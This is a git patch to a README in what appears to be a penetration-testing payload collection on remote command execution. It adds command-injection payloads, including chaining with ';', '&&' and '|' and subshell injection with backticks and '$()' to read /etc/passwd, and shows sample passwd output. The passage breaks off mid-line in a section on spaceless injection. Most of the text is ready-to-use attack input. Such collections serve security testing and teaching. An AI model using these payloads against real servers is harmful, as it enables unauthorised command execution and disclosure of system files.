From 278a130940e01e1b83d6e496266f650d56cf5efa Mon Sep 17 00:00:00 2001 From: Swissky Date: Sat, 23 Sep 2017 23:30:40 +0200 Subject: [PATCH] Command Exec - ``, $() and more bypasses --- Remote commands execution/README.md | 28 +++++++++++++++++++--------- 1 file changed, 19 insertions(+), 9 deletions(-) diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 29e0b8e..8a68054 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -1,9 +1,9 @@ -# Remote Code Execution -Remote code execution is a security vulnerability that allows an attacker to execute codes from a remote server. +# Remote Commands Execution +Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server. ## Exploits -Normal code execution, execute the command and voila :p +Normal Commands execution, execute the command and voila :p ``` cat /etc/passwd root:x:0:0:root:/root:/bin/bash @@ -12,15 +12,20 @@ bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh ``` -Code execution by chaining commands +Commands execution by chaining commands ``` original_cmd_by_server; ls original_cmd_by_server && ls original_cmd_by_server | ls -original_cmd_by_server `ls` ``` -Code execution without space - Linux +Commands execution inside a command +``` +original_cmd_by_server `cat /etc/passwd` +original_cmd_by_server $(cat /etc/passwd) +``` + +Commands execution without space - Linux ``` swissky@crashlab:~/Www$ cat